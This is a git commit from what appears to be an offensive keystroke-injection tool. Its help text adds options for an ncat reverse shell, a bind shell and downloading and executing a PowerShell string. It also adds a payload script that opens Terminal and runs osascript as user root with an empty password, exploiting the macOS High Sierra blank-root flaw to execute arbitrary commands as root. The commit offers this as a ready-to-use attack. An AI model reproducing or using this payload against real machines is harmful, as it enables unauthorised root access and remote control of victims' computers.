OSX High Sierra Root Exec + Help (commands)

master
Swissky 2017-12-03 00:34:35 +01:00
parent 5936a85c29
commit b0a553deba
2 changed files with 17 additions and 0 deletions

View File

@ -20,6 +20,13 @@ def banner():
print("-------------------------------------------------------------------")
def help():
print("--------------[ Events ]--------------")
print("q/exit => exit the program")
print("h/help => display this help message")
print("reverse => use a basic reverse-shell based on ncat")
print("bind => set up a bind-shell")
print("empire URL => download and execute a powershell string")
print("send MSG => write MSG")
print("--------------[ Commands ]--------------")
print("Comment => Rem: Comment")
print("Delay => CustomDelay:1000")

View File

@ -0,0 +1,10 @@
Rem:Title: OSX High Seria Root Exec (COMMAND+SPACE)
CustomDelay:1000
Press:131+32
Print:terminal
CustomDelay:500
Press:176
CustomDelay:3000
Print:osascript -e 'do shell script \"%s\" with administrator privileges user name \"root\" password \"\"'
CustomDelay:500
Press:176